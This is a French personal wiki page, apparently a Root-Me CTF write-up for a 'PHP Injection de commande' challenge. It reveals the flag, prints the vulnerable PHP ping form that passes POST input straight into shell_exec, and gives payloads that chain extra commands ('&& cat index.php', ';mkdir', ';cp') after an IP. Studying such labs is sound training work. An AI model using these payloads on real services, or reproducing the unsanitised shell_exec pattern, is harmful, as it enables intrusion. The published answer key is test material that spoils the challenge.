Aller au contenu

Wiki

PHP Injection de commande

Wiki

Welcome
CTF
CTF
- Hackinprovence
  Hackinprovence
  - Simple Jail
    
    Simple Jail
- Hackropole
  Hackropole
  - Babel web
    
    Babel web
  - Header
    
    Header
- RootMe
  RootMe
  - App Script
    App Script
    
    I am groot
    I am groot
    
    I am groot
  - Cracking
    Cracking
    
    ELF C++ - 0 protection
    
    PE DotNet 0 protection
    
    PE x86 - 0 protection
  - Forensic
    Forensic
    
    macOS Keychain
    macOS Keychain
    
    Rapport
    Rapport
    
    MacOS - Keychain
  - Programmation
    Programmation
    
    Suite arithmétique
    
    TCP Chaîne encodée
    TCP Chaîne encodée
    
    TCP - Retour au collège
    
    TCP La roue romaine
    TCP La roue romaine
    
    TCP - La roue romaine
    
    TCP Retour au collège
    TCP Retour au collège
    
    TCP - Retour au collège
    
    TCP Uncompress Me
    TCP Uncompress Me
    
    TCP - Uncompress Me
  - Réaliste
    Réaliste
    
    Eh oui, parfois
  - Réseau
    Réseau
    
    DNS transfert de zone
    
    LDAP null bind
    
    OSPF - Authentification
    
    Trafic Global System for Mobile communications :phone:
  - Web Client
    Web Client
    
    Javascript Obfuscation 3
    
    Javascript Webpack
    
    XSS Stockée 1
    
    XSS Stockee 1
    XSS Stockee 1
    
    TP-07 / Faille Web Client XSS
  - Web Serveur
    Web Serveur
    
    CSRF 0 protection
    
    Directory traversal
    
    Faille Web Client XSS
    
    File upload Double extensions
    
    File upload Null byte
    
    File upload Type MIME
    
    File upload ZIP
    
    HTTP Verb tampering
    
    Local File Inclusion
    
    PHP Eval
    
    PHP Injection de commande – Copie
    
    PHP Injection de commande PHP Injection de commande
    Table des matières
    
    Solution
    
    Remote File Inclusion
    
    SQL injection Authentification 1
    
    SQL injection Authentification
    
    SQL injection En aveugle
    
    SQL injection Numérique
    
    SQL injection String
    
    HTTP Verb tampering
    HTTP Verb tampering
    
    TD 220106 0935 Samuel Manechez
    
    SQL Inection En Aveugle
    SQL Inection En Aveugle
    
    SQL injection - En aveugle
    
    Readme
- SHC 2025
  SHC 2025
  - GTFO Bins
  - Linux privilege Escalation using the SUID Bit
- TBR RootMe OLD
  TBR RootMe OLD
  - Cracking
    Cracking
    
    PE DotNet 0 protection
  - Programmation
    Programmation
    
    Suite arithmétique
  - Réaliste
    Réaliste
    
    Eh oui, parfois
  - Réseau
    Réseau
    
    DNS transfert de zone
    
    LDAP null bind
  - Web Client
    Web Client
    
    Javascript Obfuscation 3
    
    Javascript Webpack
    
    XSS Stockée 1
  - Web Serveur
    Web Serveur
    
    CSRF 0 protection
    
    PHP Eval
    
    PHP Injection de commande – Copie
    
    PHP Injection de commande
    
    SQL injection Authentification 1
    
    SQL injection Authentification
    
    SQL injection En aveugle
    
    SQL injection Numérique
    
    SQL injection String
- Try Hack Me (THM)
  Try Hack Me (THM)
  - Active Directory Basics
  - Enumerating Active Directory
  - ISO27001
  - Intro to Endpoint Security
  - Vulnversity
  - Challenges
    Challenges
    
    Agent Sudo
    
    Attacktive Directory Samuel Manechez
    
    Bounty Hacker
    
    Machine à faire
    
    Post Exploitation Basics
    
    Ra
  - Web fundamentals
    Web fundamentals
    
    Authentication Bypass
    
    Authentication Bypass
    
    Content Discovery
    
    Content Discovery
    
    DNS in detail
    
    DNS in detail
    
    File Inclusion
    
    File Inclusion
    
    Idor
    
    Idor
    
    SSRF
    
    SSRF
    
    Subdomain Enumeration
    
    Subdomain Enumeration
    
    Walking An Application
    
    Walking An Application
    
    XSS
    
    XSS
Cheatsheet
Cheatsheet
- Credentials
  Credentials
  - Default Credentials
  - Liste de passwords, username, etc...
- Cyberzone
  Cyberzone
- Docker
  Docker
  - Docker
- Enumeration active
  Enumeration active
  - Automatisation
  - Nmap
- Enumeration passive
  Enumeration passive
- Exploitation
  Exploitation
  - Reverse shell
  - SQLI
- Forensic
  Forensic
- Hash
  Hash
  - Préparation
  - NTLMV2
- Osint
  Osint
  - Aides
  - Outils
- Phishing
  Phishing
  - Outils
- Rapports
  Rapports
  - Exemple de rapport de pentest
- SMB
  SMB
  - Outils
- Threat Intelligence
  Threat Intelligence
  - Outils
- Web
  Web
  - Outils
- Wifi
  Wifi
  - Les bases
  - Outils
IA
IA
- Objectif IA : initiez-vous à l'intelligence artificielle
Networks
Networks
- Cours
  Cours
  - BTS
    
    BTS
- Fun Mooc
  Fun Mooc
  - IPV6
- OPNsense
  OPNsense
- Unifi
  Unifi
Photo
Photo
- Les bases de la photo
Systems
Systems
- Linux
  Linux
  - Bases bash
    
    Bases bash
  - Debian
    
    Debian
  - Fail2ban
    
    Fail2ban
  - Flaresolverr
    
    Flaresolverr
  - Kali Linux
    
    Kali Linux
  - MkDocs
    
    MkDocs
  - Overseerr
    
    Overseerr
  - Teleport
    
    Teleport
  - Ubuntu
    
    Ubuntu
  - Uptime kuma
    
    Uptime kuma
  - Virtual machines
    
    Virtual machines
- Windows
  Windows
  - Outlook
    
    Outlook

PHP Injection de commande

Solution

127.0.0.1 && cat index.php | grep flag Le flag apparaît sous la requête ping.

$flag = "S3rv1ceP1n9Sup3rS3cure";

Code source :

<html>
<head>
<title>Ping Service</title>
</head>
<body>
<form method="POST" action="index.php">
        <input type="text" name="ip" placeholder="127.0.0.1">
        <input type="submit">
</form>
<pre>
<?php
$flag = "S3rv1ce...S3cure";
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
        $response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
        echo $response;
}
?>
</pre>
</body>
</html>

Chemin de base : /challenge/web-serveur/ch54

Création d'un dossier dans /tmp : ;mkdir /tmp/tux

Copier idnex.php dans le tmp : ;cd /tmp/tux && cp /challenge/web-serveur/ch54/index.php indexX.php && ls -la